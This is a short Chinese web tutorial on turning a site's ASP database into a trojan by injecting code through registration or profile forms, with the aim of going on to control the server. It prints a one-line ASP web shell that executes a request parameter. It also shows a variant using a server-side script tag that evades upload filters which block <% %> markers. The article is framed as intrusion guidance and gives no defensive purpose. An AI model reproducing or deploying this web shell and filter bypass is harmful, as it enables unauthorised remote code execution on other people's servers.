当前位置:首页 » 网站技术 » ASP

插入ASP代码让网站数据库成为ASP木马

...

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是:

〈%execute request("l")%〉

我们可以把它的标签换下来。

然后改成:

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。

继续阅读
ASP.NET进度条
没有数据时显示GridView表格
ASP.NET中的换行问题解决方案
ASP.NET跳转页面方法比较
ASP.NET内置功能抵御Web攻击
ASP.NET写文件实例
ASP禁用页面缓存的五种方法
ASP.NET页面间值传递方法实例
使用ASP.NET备份和还原SQL Server及Access数据库
发表评论

昵称:
最新评论
暂时没有评论!